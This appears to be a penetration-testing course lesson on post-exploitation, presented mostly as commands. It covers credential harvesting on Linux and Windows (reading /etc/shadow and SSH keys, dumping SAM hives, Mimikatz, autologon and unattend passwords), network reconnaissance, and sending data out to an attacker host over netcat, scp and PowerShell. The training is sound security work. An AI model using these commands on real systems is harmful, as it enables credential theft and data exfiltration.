Nerd Level Tech logo
Lesson 19 of 24

Post-Exploitation & Privilege Escalation

Post-Exploitation & Credential Harvesting

4 min read

After gaining elevated access, you need to extract credentials and sensitive data. This lesson covers essential post-exploitation techniques.

Information Gathering

System Information

Linux:

# Users and groups
cat /etc/passwd
cat /etc/group
cat /etc/shadow  # If readable

# Network configuration
ip a
netstat -tulnp
cat /etc/hosts

# Running processes
ps auxww

# Installed packages
dpkg -l  # Debian
rpm -qa  # RHEL

Windows:

# System info
systeminfo
hostname

# Users
net user
net localgroup administrators

# Network
ipconfig /all
netstat -ano
route print
arp -a

# Processes
tasklist /v
wmic process list brief

Credential Harvesting

Linux Credentials

Password Files:

# Check /etc/shadow permissions
ls -la /etc/shadow

# If readable, crack hashes
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john unshadowed.txt

SSH Keys:

# Find SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

# Common locations
cat /home/*/.ssh/id_rsa
cat /root/.ssh/id_rsa

History Files:

cat ~/.bash_history
cat ~/.mysql_history
cat ~/.psql_history

Configuration Files:

# Web configs
find /var/www -name "*.php" -exec grep -l "password" {} \;
find /var/www -name "*.conf" -exec grep -l "password" {} \;

# Database configs
cat /var/www/html/wp-config.php
cat /etc/mysql/my.cnf
cat ~/.my.cnf

Windows Credentials

SAM Database:

# From elevated prompt
reg save hklm\sam C:\temp\sam
reg save hklm\system C:\temp\system
reg save hklm\security C:\temp\security

# Extract with secretsdump
impacket-secretsdump -sam sam -system system -security security LOCAL

Mimikatz:

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets
lsadump::sam
lsadump::lsa /patch

Cached Credentials:

# Check for stored credentials
cmdkey /list

# Credential Manager
vaultcmd /listcreds:"Windows Credentials"

Registry Autologon:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Look for: DefaultUserName, DefaultPassword

Unattend Files:

# Common locations
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\unattended.xml
type C:\Windows\System32\sysprep\sysprep.xml

Sensitive File Locations

Linux

# Credentials
/etc/passwd
/etc/shadow
/etc/group
/etc/sudoers
~/.ssh/id_rsa
~/.ssh/authorized_keys
~/.bash_history

# Web
/var/www/html/wp-config.php
/var/www/html/config.php
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf

# Database
/var/lib/mysql/
/etc/mysql/my.cnf
~/.mysql_history

Windows

# Credentials
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\repair\SAM
C:\Windows\repair\SYSTEM

# User data
C:\Users\<user>\AppData\Local\
C:\Users\<user>\Desktop\
C:\Users\<user>\Documents\

# Web configs
C:\inetpub\wwwroot\web.config
C:\xampp\apache\conf\httpd.conf

# Passwords in files
*.txt, *.doc, *.xls, *.config, *.ini

Network Reconnaissance

Identifying Additional Targets

Linux:

# ARP cache
arp -a
cat /proc/net/arp

# Hosts file
cat /etc/hosts

# Network connections
netstat -tulnp
ss -tulnp

# Subnet scanning
for i in $(seq 1 254); do ping -c 1 192.168.1.$i | grep "64 bytes" &; done

Windows:

# ARP cache
arp -a

# Hosts file
type C:\Windows\System32\drivers\etc\hosts

# Network connections
netstat -ano

# Domain computers
net view
net view /domain

Finding Shares

Linux (for Windows targets):

# SMB shares
smbclient -L //target -N
crackmapexec smb target --shares

# NFS shares
showmount -e target

Windows:

# Local shares
net share

# Remote shares
net view \\target

Data Exfiltration

Secure Transfer Methods

Linux:

# SCP
scp sensitive_data.txt attacker@10.10.14.5:/tmp/

# Netcat
nc -w 3 10.10.14.5 4444 < sensitive_data.txt

# Base64 encode and copy
base64 -w 0 sensitive_file

Windows:

# PowerShell to attacker
Invoke-WebRequest -Uri "http://10.10.14.5/" -Method POST -Body (Get-Content C:\file.txt)

# Certutil
certutil -encode sensitive.txt encoded.b64
type encoded.b64

Post-Exploitation Checklist

□ Dump password hashes (SAM, /etc/shadow)
□ Extract cached credentials
□ Find SSH keys
□ Search for passwords in files
□ Check browser stored passwords
□ Enumerate network (ARP, hosts)
□ Find sensitive documents
□ Check for accessible shares
□ Document everything for report

Next, we'll cover pivoting and tunneling to reach additional network segments. :::

Quiz

Module 5: Post-Exploitation & Privilege Escalation

Take Quiz
FREE WEEKLY NEWSLETTER

Stay on the Nerd Track

One email per week — courses, deep dives, tools, and AI experiments.

No spam. Unsubscribe anytime.